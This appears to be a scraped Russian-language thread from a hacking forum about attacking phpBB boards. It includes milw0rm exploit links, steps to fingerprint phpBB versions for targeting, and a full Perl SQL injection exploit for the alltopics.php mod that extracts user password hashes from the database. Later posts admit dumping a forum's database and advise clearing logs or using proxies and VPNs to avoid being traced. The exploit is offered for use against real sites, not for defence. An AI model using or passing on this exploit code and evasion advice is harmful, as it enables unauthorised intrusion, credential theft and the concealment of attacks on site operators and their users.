http://milw0rm.com/exploits/1076
http://milw0rm.com/exploits/1080
а лучше юзай сборку в метасплоите (http://milw0rm.com/exploits/1113)
http://milw0rm.com/exploits/1080
а лучше юзай сборку в метасплоите (http://milw0rm.com/exploits/1113)
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Уязвимости: phpBB
- Автор темы n1†R0x
- Дата начала
хммм первый сплойт пишет сендинг в итоге и все-даже вроде пакеты не идут.
второй выдал ошибки-к сожалению незнаю перлю поэтому фигу мне-наверно спецом ошибки -)
а третий и про метасплойт фреймворк не понял если честно.Самому заюзать не получилось-все про лицензию спрашивает.
И в чем прикол метасплойта?
второй выдал ошибки-к сожалению незнаю перлю поэтому фигу мне-наверно спецом ошибки -)
а третий и про метасплойт фреймворк не понял если честно.Самому заюзать не получилось-все про лицензию спрашивает.
И в чем прикол метасплойта?
n1†R0x
Эта тема кстати не однократно обсуждалась. Как то странно видетль админа, который не выполняет правила своего форума. :fuck: :fuck:
По моему форум на phpbb вообще фиговый, куда ни глянь везде этот тип форума (почти), потом дыр в нем больше чем в дуршлаге, так что лучше учиться писать на php самому и залатать все дыри прежде чем использовать
[mod][[br] :] Погуляй денек, проветрись © [/mod]
Эта тема кстати не однократно обсуждалась. Как то странно видетль админа, который не выполняет правила своего форума. :fuck: :fuck:
По моему форум на phpbb вообще фиговый, куда ни глянь везде этот тип форума (почти), потом дыр в нем больше чем в дуршлаге, так что лучше учиться писать на php самому и залатать все дыри прежде чем использовать
[mod][[br] :] Погуляй денек, проветрись © [/mod]
Mrak
говорить все умеют. пойди напиши форум без единой дыры - я на тебя посмотрю.
2[br]: для вставки замечаний лучше юзай тег модератора
говорить все умеют. пойди напиши форум без единой дыры - я на тебя посмотрю.
2[br]: для вставки замечаний лучше юзай тег модератора
Скажите есть ли уязвимость для пропатченных форумов?
А версии можно определить например так:
2.0.20 Заходим в поиск, вводим любой запрос, жмём подряд несколько раз "поиск. Если поиск заблокировался на несколько секунд (по умолчанию на 15) и сказал вам об этом, то это она и есть. Иначе версия ниже.
2.0.19 Если после проверки на 2.0.20 поиск продолжает работать, обращаемся по адресу : http://сайт.com/форум/admin/admin_disallow.php?setmodules=00
и смотрим результат.
Форум написал: Fatal error: Call to undefined function…, значит это версия НИЖЕ 2.0.19 В остальных случаях именно она и есть.
from Achat
2Mrak ну ты LoL нах :lol2: .. Предлагаю дать статус "Клоун"
Димыч Покупай приватный слой :yes2: Заодно со мной поделишься
ease:Скажите пожалуйста как найти инъекцию на форуме?
Скажите есть ли какая-нибудь инъекция для форума версии 2.0.19 через которую можно получить доступ к файлам сайта.
Скажите есть ли какая-нибудь инъекция для форума версии 2.0.19 через которую можно получить доступ к файлам сайта.
2Димыч есть.. смотри предыдущие 2 страницы :baby:
Скажите а какой именно скрипт SQl-injection Нужно?И реально-ли через SQL-Injection на форуме доступ к файлам сайта получить?
На 2-3 предидущих смотри.. Все реально
А как называется?Скажи плизз название.
[mod][[br] :] тебе уже второй раз говорят - смотри предыдущие страницы. [/mod]
[mod][[br] :] тебе уже второй раз говорят - смотри предыдущие страницы. [/mod]
Вот сюда Кликай В самом первом посте
В самом первом посте Хм... Шой-то сплойт phpbb alltopics mod SQL injection exploit у меня выдал вот такую болтень:
И всё. :sorry: А по идее, он должен хэш выдать... :pioneer:
Код:
...
=> User ID
=> Number:
=> 2
=> Connessione in corso...
Connessione
In corso...
OK! Attacco Riuscito!И всё. :sorry: А по идее, он должен хэш выдать... :pioneer:
А там есть етот модуль? :fuck: Пиши в личку, разберемся
Добавлено в [time]1157108984[/time]
Попробуй так :huh:
Добавлено в [time]1157108984[/time]
Код:
#!/usr/bin/perl
print q{
++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ phpBB 2.0.21 (alltopics.php) SQL Injection Exploit +
+ +
+ bd0rk || SOH-Crew +
+ +
+ Mod: http://www.phpbbhacks.com/download/2821 +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++
};
use IO::Socket;
print q{
=> Insert URL
=> without ( http )
=> };
$server = <STDIN>;
chop ($server);
print q{
=> Insert directory
=> es: /forum/ - /phpBB2/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "alltopics.php?mode=&order=ASC&start=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_ users%20where%20user_id=".$user;
print "
=> Exploit in process...\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";
print "Exploit\r\n";
print "in process...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "Exploit finished!\r\n\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
print "MD5-Hash is: ".$_."\r\n";
exit();
}
}лол )) alltopics.php действительно там нету )) Я никогда пхпбб не админил, так что думал, что это дефолтный модуль )) Спасибо )
Кста, то, что я написал, тоже непашет :bang:
Подскажите пожалуйсто, если я слил БД с одного форума (не используя прокси) мой АйПи записан в логах данного форума?
Буду очень признателен..
Буду очень признателен..
Естесственно. А так, на будущее, перед уходом из системы НИКОГДА не забывай чистить логи. Ну или по крайней мере юзай проксик/сокс/VPN :diablo:
Да я обычно юзал, просто я не ожидал того что форум бажным окажется...
А сколько времени лог хранится? :sorry:
А сколько времени лог хранится? :sorry: